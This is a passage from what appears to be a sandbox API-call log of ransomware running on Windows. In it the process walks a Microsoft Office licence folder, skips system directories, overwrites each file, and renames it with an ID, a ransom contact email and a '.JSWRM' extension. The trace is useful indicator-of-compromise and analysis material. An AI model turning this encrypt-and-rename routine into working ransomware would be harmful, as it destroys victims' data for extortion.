lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.985] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0111.985] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.985] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.987] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.987] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.987] CloseHandle (hObject=0x45c) returned 1 [0111.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0111.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0111.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0111.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0111.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0111.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.987] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0111.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.988] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb30867, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecb30867, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecc61b13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5129, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_Grace-ppd.xrm-ms", cAlternateFileName="VI3490~1.XRM")) returned 1 [0111.988] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0111.988] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0111.988] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0111.989] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0111.989] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.989] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.989] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.989] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.989] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.989] lstrcmpiW (lpString1="VisioStdR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0111.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0111.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0111.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0111.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0111.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0111.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0111.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0111.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0111.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0111.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.990] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20777) returned 1 [0111.990] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0111.990] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0111.992] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.993] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0111.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.993] CloseHandle (hObject=0x45c) returned 1 [0111.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0111.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0111.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0111.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0111.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.993] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0111.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0111.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0111.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0111.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0111.994] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecabe142, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecabe142, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecbef435, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d51, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_Grace-ul-oob.xrm-ms", cAlternateFileName="VIDC87~1.XRM")) returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.994] lstrcmpiW (lpString1="VisioStdR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0111.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241038, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0111.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0111.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0111.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0111.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0111.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0111.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.995] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11601) returned 1 [0111.995] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0111.996] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0111.998] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.998] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0111.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.998] CloseHandle (hObject=0x45c) returned 1 [0111.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0111.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0111.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0111.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0111.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.999] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0111.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0112.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0112.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0112.000] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeca71ca7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeca71ca7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecba2f8d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_OEM_Perp-pl.xrm-ms", cAlternateFileName="VI5E2D~1.XRM")) returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned 1 [0112.000] lstrcmpiW (lpString1="VisioStdR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0112.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0112.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0112.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241380, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0112.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0112.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0112.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241128, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0112.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0112.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0112.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, 